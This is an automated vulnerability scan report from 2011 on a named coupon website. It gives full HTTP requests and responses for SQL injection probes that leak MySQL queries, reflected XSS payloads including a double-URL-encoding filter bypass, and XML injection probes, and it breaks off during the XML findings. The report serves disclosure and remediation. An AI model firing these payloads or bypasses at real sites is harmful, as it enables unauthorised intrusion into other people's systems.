XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, hackerprevention.info

Report generated by XSS.CX at Mon Aug 22 07:29:17 GMT-06:00 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |

Loading

1. SQL injection

1.1. http://hackerprevention.info/~coupon/coupons/alibris.html [REST URL parameter 2]

1.2. http://hackerprevention.info/~coupon/deal_pictures/0 [REST URL parameter 2]

1.3. http://hackerprevention.info/~coupon/deal_pictures/0 [REST URL parameter 3]

2. Cross-site scripting (reflected)

2.1. http://hackerprevention.info/~coupon/ [REST URL parameter 1]

2.2. http://hackerprevention.info/~coupon/coupons.html [REST URL parameter 1]

2.3. http://hackerprevention.info/~coupon/coupons/alibris.html [REST URL parameter 1]

3. XML injection

3.1. http://hackerprevention.info/~coupon/ [REST URL parameter 1]

3.2. http://hackerprevention.info/~coupon/coupons.html [REST URL parameter 1]

3.3. http://hackerprevention.info/~coupon/coupons/alibris.html [REST URL parameter 1]

4. Cross-domain script include

4.1. http://hackerprevention.info/

4.2. http://hackerprevention.info/~coupon/

4.3. http://hackerprevention.info/~coupon/coupons.html

4.4. http://hackerprevention.info/~coupon/coupons/alibris.html

4.5. http://hackerprevention.info/~coupon/deal_pictures/0

5. Cookie without HttpOnly flag set

6. TRACE method is enabled

7. Robots.txt file



1. SQL injection  next
There are 3 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Remediation background

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://hackerprevention.info/~coupon/coupons/alibris.html [REST URL parameter 2]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://hackerprevention.info
Path:   /~coupon/coupons/alibris.html

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /~coupon/coupons'/alibris.html HTTP/1.1
Host: hackerprevention.info
Proxy-Connection: keep-alive
Referer: http://hackerprevention.info/~coupon/coupons.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s=8ab01134a08f4dbcfde148380a9483ae; __utma=1.1812416087.1313977860.1313977860.1313977860.1; __utmb=1.2.10.1313977860; __utmc=1; __utmz=1.1313977860.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response 1

HTTP/1.1 200 OK
Date: Mon, 22 Aug 2011 02:15:13 GMT
Server: Apache/2.2.19 (Unix) mod_ssl/2.2.19 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.17
Vary: Host,Accept-Encoding,User-Agent
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 227
Content-Type: text/html

SELECT * from dc_stores WHERE domain = 'coupons'/alibris' LIMIT 1|1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' LIMIT 1' at line 1

Request 2

GET /~coupon/coupons''/alibris.html HTTP/1.1
Host: hackerprevention.info
Proxy-Connection: keep-alive
Referer: http://hackerprevention.info/~coupon/coupons.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s=8ab01134a08f4dbcfde148380a9483ae; __utma=1.1812416087.1313977860.1313977860.1313977860.1; __utmb=1.2.10.1313977860; __utmc=1; __utmz=1.1313977860.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response 2

HTTP/1.0 200 OK
Date: Mon, 22 Aug 2011 02:15:18 GMT
Server: Apache/2.2.19 (Unix) mod_ssl/2.2.19 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.17
Vary: Host,Accept-Encoding,User-Agent
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 184314
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Deals and Coupo
...[SNIP]...

1.2. http://hackerprevention.info/~coupon/deal_pictures/0 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://hackerprevention.info
Path:   /~coupon/deal_pictures/0

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /~coupon/deal_pictures'/0 HTTP/1.1
Host: hackerprevention.info
Proxy-Connection: keep-alive
Referer: http://hackerprevention.info/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s=8ab01134a08f4dbcfde148380a9483ae

Response 1

HTTP/1.1 200 OK
Date: Mon, 22 Aug 2011 02:04:07 GMT
Server: Apache/2.2.19 (Unix) mod_ssl/2.2.19 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.17
Vary: Host,Accept-Encoding,User-Agent
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 227
Content-Type: text/html

SELECT * from dc_stores WHERE domain = 'deal_pictures'/0' LIMIT 1|1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' LIMIT 1' at line 1

Request 2

GET /~coupon/deal_pictures''/0 HTTP/1.1
Host: hackerprevention.info
Proxy-Connection: keep-alive
Referer: http://hackerprevention.info/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s=8ab01134a08f4dbcfde148380a9483ae

Response 2

HTTP/1.0 200 OK
Date: Mon, 22 Aug 2011 02:04:12 GMT
Server: Apache/2.2.19 (Unix) mod_ssl/2.2.19 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.17
Vary: Host,Accept-Encoding,User-Agent
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 184272
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Deals and Coupo
...[SNIP]...

1.3. http://hackerprevention.info/~coupon/deal_pictures/0 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://hackerprevention.info
Path:   /~coupon/deal_pictures/0

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /~coupon/deal_pictures/0' HTTP/1.1
Host: hackerprevention.info
Proxy-Connection: keep-alive
Referer: http://hackerprevention.info/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s=8ab01134a08f4dbcfde148380a9483ae

Response 1

HTTP/1.1 200 OK
Date: Mon, 22 Aug 2011 02:04:32 GMT
Server: Apache/2.2.19 (Unix) mod_ssl/2.2.19 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.17
Vary: Host,Accept-Encoding,User-Agent
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 244
Content-Type: text/html

SELECT * from dc_stores WHERE domain = 'deal_pictures/0'' LIMIT 1|1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''deal_pictures/0'' LIMIT 1' at line 1

Request 2

GET /~coupon/deal_pictures/0'' HTTP/1.1
Host: hackerprevention.info
Proxy-Connection: keep-alive
Referer: http://hackerprevention.info/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s=8ab01134a08f4dbcfde148380a9483ae

Response 2

HTTP/1.0 200 OK
Date: Mon, 22 Aug 2011 02:04:35 GMT
Server: Apache/2.2.19 (Unix) mod_ssl/2.2.19 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.17
Vary: Host,Accept-Encoding,User-Agent
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 184314
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Deals and Coupo
...[SNIP]...

2. Cross-site scripting (reflected)  previous  next
There are 3 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


2.1. http://hackerprevention.info/~coupon/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://hackerprevention.info
Path:   /~coupon/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0729"><script>alert(1)</script>26c256d2387 was submitted in the REST URL parameter 1. This input was echoed as f0729\"><script>alert(1)</script>26c256d2387 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /~couponf0729"><script>alert(1)</script>26c256d2387/ HTTP/1.1
Host: hackerprevention.info
Proxy-Connection: keep-alive
Referer: http://hackerprevention.info/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s=8ab01134a08f4dbcfde148380a9483ae; __utma=1.1812416087.1313977860.1313977860.1313977860.1; __utmb=1.1.10.1313977860; __utmc=1; __utmz=1.1313977860.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Mon, 22 Aug 2011 02:13:59 GMT
Server: Apache/2.2.19 (Unix) mod_ssl/2.2.19 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.17
Vary: Host,Accept-Encoding,User-Agent
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: s123user=12a9943769977dfa570a2cc3811e52ac.1313979250; expires=Mon, 22-Aug-2011 02:44:10 GMT; path=/
Set-Cookie: s123user=12a9943769977dfa570a2cc3811e52ac.1313979250; expires=Mon, 22-Aug-2011 02:44:10 GMT; path=/
Set-Cookie: s123user=12a9943769977dfa570a2cc3811e52ac.1313979250; expires=Mon, 22-Aug-2011 02:44:10 GMT; path=/
Content-Length: 171251
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
   <title>script&gt;26c256d2387 -- h
...[SNIP]...
<a href="/~couponf0729\"><script>alert(1)</script>26c256d2387/computer-hacker-prevention.html">
...[SNIP]...

2.2. http://hackerprevention.info/~coupon/coupons.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://hackerprevention.info
Path:   /~coupon/coupons.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7ed8c"><script>alert(1)</script>83aad05425b was submitted in the REST URL parameter 1. This input was echoed as 7ed8c\"><script>alert(1)</script>83aad05425b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /~coupon7ed8c"><script>alert(1)</script>83aad05425b/coupons.html HTTP/1.1
Host: hackerprevention.info
Proxy-Connection: keep-alive
Referer: http://hackerprevention.info/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s=8ab01134a08f4dbcfde148380a9483ae; __utma=1.1812416087.1313977860.1313977860.1313977860.1; __utmb=1.1.10.1313977860; __utmc=1; __utmz=1.1313977860.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Mon, 22 Aug 2011 02:11:16 GMT
Server: Apache/2.2.19 (Unix) mod_ssl/2.2.19 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.17
Vary: Host,Accept-Encoding,User-Agent
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: s123user=bca490bbec9f6fb7385c236acdf1e659.1313979080; expires=Mon, 22-Aug-2011 02:41:20 GMT; path=/
Set-Cookie: s123user=bca490bbec9f6fb7385c236acdf1e659.1313979080; expires=Mon, 22-Aug-2011 02:41:20 GMT; path=/
Set-Cookie: s123user=bca490bbec9f6fb7385c236acdf1e659.1313979080; expires=Mon, 22-Aug-2011 02:41:20 GMT; path=/
Content-Length: 181523
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
   <title>coupons -- hackerpreventio
...[SNIP]...
<a href="/~coupon7ed8c\"><script>alert(1)</script>83aad05425b/computer-hacker-prevention.html">
...[SNIP]...

2.3. http://hackerprevention.info/~coupon/coupons/alibris.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://hackerprevention.info
Path:   /~coupon/coupons/alibris.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d9bb%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253edafe5e2e257 was submitted in the REST URL parameter 1. This input was echoed as 9d9bb\"><script>alert(1)</script>dafe5e2e257 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /~coupon9d9bb%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253edafe5e2e257/coupons/alibris.html HTTP/1.1
Host: hackerprevention.info
Proxy-Connection: keep-alive
Referer: http://hackerprevention.info/~coupon/coupons.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s=8ab01134a08f4dbcfde148380a9483ae; __utma=1.1812416087.1313977860.1313977860.1313977860.1; __utmb=1.2.10.1313977860; __utmc=1; __utmz=1.1313977860.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Mon, 22 Aug 2011 02:12:10 GMT
Server: Apache/2.2.19 (Unix) mod_ssl/2.2.19 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.17
Vary: Host,Accept-Encoding,User-Agent
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: s123user=f30fa648bea3defaf3f4d6c375aee388.1313979130; expires=Mon, 22-Aug-2011 02:42:10 GMT; path=/
Set-Cookie: s123user=f30fa648bea3defaf3f4d6c375aee388.1313979130; expires=Mon, 22-Aug-2011 02:42:10 GMT; path=/
Set-Cookie: s123user=f30fa648bea3defaf3f4d6c375aee388.1313979130; expires=Mon, 22-Aug-2011 02:42:10 GMT; path=/
Content-Length: 182055
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
   <title>alibris -- hackerpreventio
...[SNIP]...
<a href="/~coupon9d9bb\"><script>alert(1)</script>dafe5e2e257/coupons/computer-hacker-prevention.html">
...[SNIP]...

3. XML injection  previous  next
There are 3 instances of this issue:

Issue background

XML or SOAP injection vulnerabilities arise when user input is inserted into a server-side XML document or SOAP message in an unsafe way. It may be possible to use XML metacharacters to modify the structure of the resulting XML. Depending on the function in which the XML is used, it may be possible to interfere with the application's logic, to perform unauthorised actions or access sensitive data.

This kind of vulnerability can be difficult to detect and exploit remotely; you should review the application's response, and the purpose which the relevant input performs within the application's functionality, to determine whether it is indeed vulnerable.

Issue remediation

The application should validate or sanitise user input before incorporating it into an XML document or SOAP message. It may be possible to block any input containing XML metacharacters such as < and >. Alternatively, these characters can be replaced with the corresponding entities: &lt; and &gt;.


3.1. http://hackerprevention.info/~coupon/ [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://hackerprevention.info
Path:   /~coupon/

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /~coupon]]>>/ HTTP/1.1
Host: hackerprevention.info
Proxy-Connection: keep-alive
Referer: http://hackerprevention.info/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s=8ab01134a08f4dbcfde148380a9483ae; __utma=1.1812416087.1313977860.1313977860.1313977860.1; __utmb=1.1.10.1313977860; __utmc=1; __utmz=1.1313977860.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Mon, 22 Aug 2011 02:18:37 GMT
Server: Apache/2.2.19 (Unix) mod_ssl/2.2.19 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.17
Vary: Host,Accept-Encoding,User-Agent
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: s123user=11f6fb9622c395cceb58f2d4e6745ea1.1313979517; expires=Mon, 22-Aug-2011 02:48:37 GMT; path=/
Set-Cookie: s123user=11f6fb9622c395cceb58f2d4e6745ea1.1313979517; expires=Mon, 22-Aug-2011 02:48:37 GMT; path=/
Set-Cookie: s123user=11f6fb9622c395cceb58f2d4e6745ea1.1313979517; expires=Mon, 22-Aug-2011 02:48:37 GMT; path=/
Content-Length: 175594
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
   <title>~coupon]]&gt;&gt; -- hacke
...[SNIP]...
<a href="/Soap-And-Other-Detergents">Soap And Other Detergents</a>
...[SNIP]...

3.2. http://hackerprevention.info/~coupon/coupons.html [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://hackerprevention.info
Path:   /~coupon/coupons.html

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /~coupon]]>>/coupons.html HTTP/1.1
Host: hackerprevention.info
Proxy-Connection: keep-alive
Referer: http://hackerprevention.info/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s=8ab01134a08f4dbcfde148380a9483ae; __utma=1.1812416087.1313977860.1313977860.1313977860.1; __utmb=1.1.10.1313977860; __utmc=1; __utmz=1.1313977860.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Mon, 22 Aug 2011 02:16:39 GMT
Server: Apache/2.2.19 (Unix) mod_ssl/2.2.19 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.17
Vary: Host,Accept-Encoding,User-Agent
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: s123user=c02f1e4c720712392ea001635b5b1cf4.1313979401; expires=Mon, 22-Aug-2011 02:46:41 GMT; path=/
Set-Cookie: s123user=c02f1e4c720712392ea001635b5b1cf4.1313979401; expires=Mon, 22-Aug-2011 02:46:41 GMT; path=/
Set-Cookie: s123user=c02f1e4c720712392ea001635b5b1cf4.1313979401; expires=Mon, 22-Aug-2011 02:46:41 GMT; path=/
Content-Length: 180744
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
   <title>coupons -- hackerpreventio
...[SNIP]...
<a href="/Soap-And-Other-Detergents">Soap And Other Detergents</a>
...[SNIP]...

3.3. http://hackerprevention.info/~coupon/coupons/alibris.html [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://hackerprevention.info
Path:   /~coupon/coupons/alibris.html

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /~coupon]]>>/coupons/alibris.html HTTP/1.1
Host: hackerprevention.info
Proxy-Connection: keep-alive
Referer: http://hackerprevention.info/~coupon/coupons.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s=8ab01134a08f4dbcfde148380a9483ae; __utma=1.1812416087.1313977860.1313977860.1313977860.1; __utmb=1.2.10.1313977860; __utmc=1; __utmz=1.1313977860.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Mon, 22 Aug 2011 02:15:09 GMT
